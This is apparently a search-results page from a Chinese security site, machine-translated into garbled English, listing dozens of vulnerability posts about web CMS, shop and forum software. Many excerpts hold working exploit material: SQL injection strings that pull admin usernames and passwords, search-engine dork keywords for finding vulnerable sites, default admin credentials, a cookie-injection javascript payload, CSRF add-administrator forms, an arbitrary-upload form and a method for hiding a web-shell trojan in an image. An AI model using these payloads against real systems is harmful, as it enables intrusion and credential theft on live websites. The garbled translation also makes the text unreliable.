7620 matches found
RivetTracker multiple SQL injection vulnerabilities-vulnerability warning-the black bar safety net
Affected system: rivettracker rivettracker =1.03 Description: -------------------------------------------------------------------------------- BUGTRAQ ID: 5 2 2 8 3 CVE ID: CVE-2 0 1 2-4 9 9 6 RivetTracker is PHPBTTracker the revised version by"DeHackEd"with PHP, using MySQL as the database...
The bulk of the invasion College Station vulnerability EXP-vulnerability warning-the black bar safety net
By:deleter QQ:1 3 4 3 3 8 2 3 9 2 College Station substantially with the revision of the cms, and the cms in there must be the editor. Currently the editor of the vulnerability is less, is relatively safe, but College Station is not the same. A College website is bound to be a year old, unless th...
Btoo shop system sql injection vulnerability-vulnerability warning-the black bar safety net
Not to submit the parameters to filter Detailed description: productfircla. asp & helphelp. asp These two files eg:http://www. admin163. net:8 0/help/help. asp? id=1 http://www.admin63.net/product/fircla.asp?flag=1&proclaid=1 Table name chinammcadmin field mmcusername mmcpassword...
The zend framework xxe injection analysis-vulnerability warning-the black bar safety net
A few days ago online broke a zend framework vulnerability author: mkods Specifically described as follows: ; according to the description, the vulnerability occurs in the zend Framework xmlrpc module of an xxeXML external entity injection vulnerability this vulnerability can be read on server...
WordPress information leakage and illegal operation vulnerability-vulnerability warning-the black bar safety net
Affected system: WordPress WordPress 3. x Description: -------------------------------------------------------------------------------- WordPress is a PHP language and MySQL database development Blog(blog, blogengine, users can support PHP and MySQL database server on build your own Blog...
A hotel management system vulnerability analysis-vulnerability warning-the black bar safety net
1:injection review: http://www.xxx.com /Company. asp? id=1 Table name:Nwebadmin,direct al D can be added, the ID=trimrequest. QueryString"id" //directly pass the value of ID,but the filter only has 2 sides of space if ID="" then ID=1 //judge the statement, whatever it set Rs = server...
WordPress Sitemile Auctions plugin arbitrary file upload vulnerability-vulnerability warning-the black bar safety net
Affected system: WordPress Sitemile Auctions Plugin 2. x Description: -------------------------------------------------------------------------------- WordPress is a PHP language and MySQL database development Blog(blog, blogengine, users can support PHP and MySQL database server on build your ow...
5ucms the latest version sql injection vulnerability-vulnerability warning-the black bar safety net
Vulnerability files:/mobile/index. asp Vulnerability description: not the variable id filtered resultsql injection it! Vulnerability test: http://www.5u.hk/ official Vulnerability to prove↓ ! QQ 截图 20120606183325.jpg Vulnerability EXP↓ /mobile/index. asp? act=view&id=1%20union%20select%2 0...
shopxp online shopping system v7. 4 SQL injection vulnerability-vulnerability warning-the black bar safety net
Keywords: inurl:shopxpnews. asp Injected code: TEXTBOX2. ASP? action=modify&news%69d=1 2 2%20and%2 0 1=2%20union%20select%201,2,admin%2bpassword,4,5,6,7%20from%20shopxpadmin Broke the user name and password note: username and password are connected together, after the sixth bit is the password MD...
Axous 1.1.1 multiple defects (CSRF-persistent XSS)-a vulnerability warning-the black bar safety net
Title: Axous 1.1.1 Multiple Vulnerabilities CSRF - Persistent XSS Author: Ivano Binetti http://www.ivanobinetti.com Software download: http://www.axous.com/get.php?pid=1 App developer website: http://www.axous.com/ Affects versions : 1.1.1 and lower Test system : Debian Squeeze 6.0...
Struts2 and Webwork remote command execution vulnerability analysis-vulnerability warning-the black bar safety net
The vulnerability discovered by the publisher of the POC, and can not affect the xwork 2.1.2 prior to some versionthis version before some of the versions below will be collectively referred to as the old version, then called the new version, such as struts 2.0.14that is, the struts patch A N...
almnzm 2.4 <= CSRF flaws (add administrator)and fix-vulnerability warning-the black bar safety net
Developer: almnzm.com Author: HaNniBaL KsA HK [email protected] CSRF testadd a new administrator : centerbfont face="Tahoma" size="5" font color="FF0000"Priv8/font span dir="ltr"font color="FF0000"Almnzm 2.4/fontfont color="ffffff" /font/span CSRF Exploit!! /fontfont face="Tahoma" size="2"/fontfont...
Postal savings banks the UKEY useless-vulnerability warning-the black bar safety net
Today to the postal Savings Bank postal savings bank of china to go to the opening of the postal green card through the online banking, in order to safeguard the Bank account of the funding security, the requirements for online banking opened UKEY protection, the Bank staff attitude good, and...
Pass to kill IIS7. 0 deformity parsing 0day vulnerabilities-vulnerability warning-the black bar safety net
To merge a PHP word pictures of horses, the combined method: ① , DOS merge: copy 1.gif /b + 1. txt/a asp.gif ② , With edjpgcom, make picture and word Trojan of the merger, Pictures just to find one. 【Incidentally, with the way edjpgcom the use of method: open the edjpgcom. exe the folder, and the...
Wind noise CMS 0DAY exploits-exploits warning-the black bar safety net
Keywords: inurl:User/Regservice. asp The wind noise the registration page... Vulnerability page:/user/SetNextOptions. asp Use method: Constructor injection user/SetNextOptions. asp? sType=1&EquValue=aaaa&SelectName=aaa&ReqSql=select+1,adminname,3,4,5,6,7,8++from+FSMFAdmin “adminname”admin user na...
Akiva WebBoard 8. x SQL injection flaws and fixes-vulnerability warning-the black bar safety net
Title: Akiva Webboard 8. x SQL Injection + Plaintext Passwords in Profiles. Author: Alexander Fuchs www.2cto.com Download address: http://www.akiva.com/default.asp?l=1&id=8 Affected versions: 8. x Test platform: Windows, Linux. It is possible to login as administrator with admin'-- as the usernam...
WHMCS (cart.php) local file disclosure flaws and fixes-vulnerability warning-the black bar safety net
Author: R-t33n Product: WHMCS Developer: http://whmcs.com/ Affected version: 4. x. x Defect type: Remote , webapps Test platform windows 2 0 0 3 , Linux , ubuntu. ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ http://www.badguest.cn/ PATH /cart. php? a=wrong...
whmcs hosting management system 0day and fix-vulnerability warning-the black bar safety net
First register an id Submitted a ticket as follows...
ESPCMS pass to kill 0day-vulnerability warning-the black bar safety net
Baidu keywords:inurl:index. php? ac=article&at=read&did= =========================================================================================================== 默认 后台 :adminsoft/index.php OR admin...
EspCms site system injection vulnerability and fix-vulnerability warning-the black bar safety net
The injection pointburst table prefix: index. php? ac=search&at=taglist&tagkey=%2 5 2 7,tags orselect 1 fromselect count,concatselect select concat0x7e,0x27,tablename,0x27,0x7e from informationschema. the tables where tableschema=database limit 0,1,floorrand02x from informationschema. tables grou...
EspCms site system injection vulnerability-vulnerability warning-the black bar safety net
Baidu keywords: inurl:index. php? ac=article&at=read&did= The injection pointburst table prefix: index. php? ac=search&at=taglist&tagkey=%2 5 2 7,tags orselect 1 fromselect count,concatselect select concat0x7e,0x27,tablename,0x27,0x7e from informationschema. the tables where tableschema=database...
2taoke2. 2 injection flaws and fixes-vulnerability warning-the black bar safety net
Team:t00ls Author: Cond0r if$REQUEST ifgetmagicquotesgpc $REQUEST = taostrip$REQUEST; else $POST = taocheck$POST; $GET = taocheck$GET; @extract$POST; @extract$GET; $REQUEST=filterxss$REQUEST, ALLOWEDHTMLTAGS; @extract$REQUEST; Just do a simple simple filtration Vulnerability file shops.php $cid =...
ewebeditor(PHP) Ver 3.8 present an arbitrary file upload 0day-vulnerability warning-the black bar safety net
titleeWebeditoR3. 8 for php any file on the EXP/title form action=”" method=post enctype=”multipart/form-data” INPUT TYPE="hidden" name="MAXFILESIZE" value="5 1 2 0 0 0" URL:input type=text name=url value=”http://www.sitedirsec.com/ewebeditor/” size=1 0 0br INPUT TYPE=”hidden” name=”aStyle1 2”...
JqueryUpload large file upload arbitrary file upload vulnerability-vulnerability warning-the black bar safety net
Guess the solutions to catalog, direct access to the default. aspx you may need to modify the parameter uploadid,the specific capture can be seen, can not make the undefined) 2. Test upload, the capture 3. Modify the Upload Directory can be arbitrarily specified 4. Guessing file name: the server...
Chi youdao professional travel system v1. 6. 5 vulnerability-vulnerability warning-the black bar safety net
Title: wisdom and the Word of the professional tour system v1. 6. 5 vulnerability Time: 2011-10-30 Team:makebugs Author: fate Injection article: http://t.qq.com/MakeBug http://hi.baidu.com/micropoor '\inc\incsql. asp % dim sqlleach,sqlleach0,SqlDATA,SQLGet,SqlPost sqlleach =...
WHMCompleteSolution (cart.php)local file disclosure flaws and fixes-vulnerability warning-the black bar safety net
Title: WHMCompleteSolution cart.php Local File Disclosure Author: Lagripe-Dz www.badguest.cn Developer: WHMCS WHMCompleteSolution http://whmcs.com/ Affected version: 3. x. x , 4.0. x Test platform: linux+apache Defect file: cart.php --------- Code analysis: --------- if $a == "add" $templatefile...
Furniture flooring group website the entire Station v1. 0 cookie injection vulnerability-vulnerability warning-the black bar safety net
Source code description: All-round corporate website system-the group of beautiful atmospheric versionDouble version simplified and traditional, the latest optimization background and the keyword version, the anti - SQL injection. Administrator address:../admin/adminlogin. asp Administrator...
shopex password retrieve at the newly generated password may predict vulnerability-vulnerability warning-the black bar safety net
Brief description: shopex in the password place, there are some logic design problems, the cause can be predicted the newly-generated password may be used to attack acquiring others passwords Detailed description: The relevant code /core/shop/controller/ctl. passport. php: function sendPSW...
The copper plate while the net mass mailing statistics system v1. 2 vulnerability and the Fix-vulnerability warning-the black bar safety net
Team:makebugs Author: fate 'Fenlei. asp IF Request. QueryString"Action"="del" Then ID=Request. QueryString"ID" IF Countss "tui","Fenlei",ID 0 then 'Slightly IF Request. QueryString"Action"="Add" Then Tname=Request. Form"Typename" Set Rs=Server. CreateObject"adodb. Recordset" Sql="Select From Fenl...
ShopEx easy distribution file to remove the vulnerability and repair-vulnerability warning-the black bar safety net
Brief description: white cap to go all over the world. Chivalry very carefully. Detailed description: this vulnerability in the same out in the template Management Service.。 Delete a template where you can construct the url you can delete any file including the whole Station, delete are possible...
Chi youdao professional travel system v1. 0 vulnerability-vulnerability warning-the black bar safety net
Default information: “Chi youdao”professional travel site system is wise to have team professional development, for the current tourism platform for powerful features developers! Back office management Background path: admin/login. asp Administrator: user:admin Password: psw:1 2 3 4 5 6 下载 地址...
foosun 0day latest injection vulnerability-vulnerability warning-the black bar safety net
Wind noise foosun of the registration document the presence of vulnerabilities. Hackers can storm the administrator account and password. Vulnerability file: www.xxx.com/user/SetNextOptions.asp Using a simple method: Storm administrator account:...
Jackie novel CMS serialized system arbitrary file upload 0day-vulnerability warning-the black bar safety net
Registered users Into space-the album-upload With oprea live firefox modifying the source code There is a. jpg . gif of the place changedto. You can upload any file Keywords: inurl:modules/space...
PHPaa CMS 4. 0 injection 0day-vulnerability warning-the black bar safety net
One is called Philip the brother of the storm vulnerability. It storms a lot of Holes. Uh, I think PHPaa pretty safe. Uh, the big cattle do not see it could it? I like injection. Just inject this. Other own Baidu Bit. Vulnerability file: admin/page.add.php admin/ message.action.php...
iGiveTest 2.1.0 injection vulnerability-vulnerability warning-the black bar safety net
Version: = 2.1.0 Homepage: http://iGiveTest.com/ Google keywords: “Powered by iGiveTest” Just register for an account. And then the storm of the administrator account and password http://www.xxxx.com/users.php?action=groups&order=-1&the userids=-1 union select...
EC_word enterprise management system injection exploit-vulnerability warning-the black bar safety net
The program uses maple General-purpose anti injection 1. 0 asp Edition, this anti-injection completely tasteless, the site program proshow. asp with cookies to injection, or variant of the injection, before injection can first determine what number of fields: ORdeR By xx Injected statement: ANd 1...
phpMyAdmin3. X Remote Code Execution exploit-vulnerability warning-the black bar safety net
Use Conditions: 1. a "config" file must be writable or can be created 2. In PHP. ini to session. autostart = 1 Tasteless: PHP. ini in session. autostart default is 0 python EXP:http://dl.dbank.com/c060w98buu PhpMyAdmin of 3. x Swekey remote code injection vulnerability PHP EXP: THE ? php echo...
EC_word enterprise management system injection vulnerability-vulnerability warning-the black bar safety net
Keywords: inurl:proshow. asp? showid= The program uses maple General-purpose anti injection 1. 0asp Edition, this anti-injection completely tasteless, the site program proshow. asp with cookies to injection, or variant of the injection, before injection can first determine what number of fields:...
Amoy Royal Taobao guest security vulnerabilities and fixes-vulnerability warning-the black bar safety net
Official website: http://www.taodisoft.com 1, demo Station background turned out to have a place to upload pictures, does not prohibit the upload. 2, the upload image simple filtration, easy to break, Upload a php file, and can be executed. 3, the servervpsconfiguration severe lower, get a webshe...
A company source cookie injection vulnerability-vulnerability warning-the black bar safety net
源码 下载 :http://www.mycodes.net/25/4585.htm Default background:admin/login. asp Injection point:http://127.0.0.1/shownews. asp? id=2 1 6 exp: javascript:alertdocument. cookie="id="+escape"2 1 6 and 1=2 union select 1,username,password,4,5,6,7,8,9,1 0 from admin"; Either 1 of 2 fields...
Webcat multiple blind defect and repair-vulnerability warning-the black bar safety net
Exploit Title: Webcat - two blind defect Google Dork: allinurl: scwebcat/ecat/cmsview.php Date: 6/23/2011 Author: w0rd w0rdatNULL0x00.com Software Link: http://webcat.sourceforge.net/ Tested on: Linux/Windows 7 Vulnerable Parameters: webid=, id= PoC:...
Analysis of the postgresql database attack techniques II-vulnerability warning-the black bar safety net
You can see we broke up in a field for the name, then we continue incrementing the offset value, to obtain the other field, as shown in Figure 9 and 1=2 union select 1,columnname,'3','4' from informationschema. the columns where tablename='admins' offset 2 limit 1-- ! Figure 9 Field passowrd is...
Discuz! NT 2. x – 3.5.2 user control poster SQL injection vulnerability-vulnerability warning-the black bar safety net
ajaxtopicinfo. ascx user control poster SQL injectionvulnerability Combined with ajax. aspx call any user control vulnerability In the file admin/UserControls/ ajaxtopicinfo. ascx in Go to the function GetCondition WebsiteManage. cs //6 2 rows if posterlist != “” string poster = posterlist...
eFront add administrator CSRF vulnerability-vulnerability warning-the black bar safety net
Vulnerability description: eFront is a tool for small and medium businesses, schools, government provide a PHP content management system, due to design defect, causing the remote to add the management, modification Management, Configuration, etc. multiple cross-site request forgery...
Pacer Edition CMS 2.1 (l param)local file inclusion flaw and fix-vulnerability warning-the black bar safety net
Pacer Edition CMS 2.1 l param Local File Inclusion Vulnerability Vendor: The Pacer Edition Product web page: http://www.thepaceredition.com Affected version: RC 2.1 SVN: 8 6 7 Summary: The 'Pacer Edition' is a Content Management SystemCMS written using PHP 5.2.9 as a minimum requirement. The Pace...
Van Norman enterprise website management system upload vulnerability-vulnerability warning-the black bar safety net
| Van Norman enterprise website management system upload vulnerability, the program in the source House of the month ranking third. The download amount is still very large. Is vulnerability, not as it is negligence,“vulnerability”is the editor fckeditor test upload page is not deleted, to hack...
Diy-Page v8. 2 0day-vulnerability warning-the black bar safety net
Release date: 2011-2-2 Affected versions: v8. 2 Program description: The DiY-Page was founded in 2 0 0 5 year 2 the end of the month, is a new concept of a custom portal system, using which, you can easily turn the forum into a quasi-portal site. Initially it is by the software authors on the sit...
Simple article management system cookie injection vulnerabilities pass to kill all versions-bug warning-the black bar safety net
Simple article management system uses a classification, the interface simple, feature simple and practical. Delete the article, article related images also be deleted minus Less junk files exist. The backstage management entrance http://Domain/admin username and password are admin Backend module:...
pub918 software company website system 1. 3 the presence of multi-vulnerability-vulnerability warning-the black bar safety net
pub918 software company site system is a great-looking corporate type website Background Username Password admin Download: http://www.mycodes.net/25/4040.htm Background: admin/ Default database: admin/db/N%2 3%23ews. mdb 1, The ewebeditor problem. Path:...
BMForum Myna 6.0 SQL injection vulnerability-vulnerability warning-the black bar safety net
BMForum is a used in personal, business areas based on the MySQL database to the new PHP Forum program. BMForum Myna 6.0 existSQL injectionvulnerabilities that could lead to sensitive information disclosure. +info: BMForum Myna 6.0 SQL Injection Vulnerability Author: Stephan Sattler Software...